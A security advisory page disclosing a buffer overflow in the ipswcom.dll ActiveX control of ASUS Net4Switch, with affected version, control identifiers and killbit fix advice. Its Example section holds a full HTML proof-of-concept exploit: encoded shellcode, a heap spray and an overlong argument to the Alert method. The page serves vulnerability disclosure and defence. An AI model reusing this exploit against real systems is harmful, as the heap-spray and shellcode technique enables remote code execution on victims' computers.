Services Vulnerabilities Exploits Publications News Blog About DSecRG


[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

ASUS Net4Switch contains ActiveX component ipswcom.dll which is vulnerable to buffer overflow attack.

Application: ASUS Net4Switch
Versions Affected: ASUS Net4Switch ipswcom.dll 1.0.0.1
Vendor URL: http://www.asus.com
Bugs: Buffer Overflow
Exploits: YES
Reported: 22.04.2010
Vendor response: none
Public Advisory: 17.02.2012
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG]


Details
*******
An attacker can construct html page which would call vulnerable function "Alert" from ActiveX ipswcom.dll with long parameter.


Tested on:
ASUS Net4Switch ipswcom.dll 1.0.0.1


Class CIPSWComItf
GUID: {1B9E86D8-7CAF-46C8-9938-569B21E17A8E}
Number of Interfaces: 1
Default Interface: IIPSWComItf
RegKey Safe for Script: True
RegKey Safe for Init: False
KillBitSet: False


Example
*******

<HTML>
<HEAD>
<TITLE>DSecRG: Asus exploit by EvdokimovDS</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E'></object>
<SCRIPT>

function Exploit()
{

//Shellcode exec notepad
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%
u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61
%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud00
1%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3c
e3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf
475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u
588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%
ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850
%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063
c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u74
6f%u7065%u6461%u0000");

//Heap-spray
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++) mem[i]=bigbk+shell;

//Buffer overflow
var bf=unescape("%u0d0d%u0d0d");
var buf="";
while (buf.length<8000) buf=buf+bf;

vuln.Alert(buf);
}

Exploit();
</SCRIPT>
</BODY>
</HTML>


Fix Information
***************
No fix
Use KillBit


References
**********
http://dsecrg.com/pages/vul/show.php?id=417


About DSecRG
*******
The main mission of DSecRG is to conduct researches of business critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The result of this work is then integrated in ERPScan Security Scanner. Being on the top edge of ERP and SAP security DSecRG research helps to improve quality of ERPScan consulting services and protects you from the latest threats.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com


About ERPScan
*******
ERPScan is an innovative company engaged in the research of ERP security. It develops products for ERP system security assessment. Apart from this, the company provides consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessment and penetration testing of custom solutions.
Our flagship products are "ERPScan Security Scanner for SAP" and "ERPScan Online" service which can help customers to perform automated security assessments and compliance checks for SAP solutions.
Contact: info [at] erpscan [dot] com
http://www.erpscan.com

Vulnerabilities RSS RSS
21.03.2012
[DSECRG-12-019] vCenter Orchestrator - password disclosure

22.02.2012
[DSECRG-12-018] Oracle Application Server - multiple security vulnerabilities

17.02.2012
[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

17.02.2012
[DSECRG-12-016] SAP MessagingSystem - information disclosure

17.02.2012
[DSECRG-12-014] SAP Internet Sales - XSS

17.02.2012
[DSECRG-12-015] SAP Adapter Monitor - information disclosure

Vulnerabilities list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search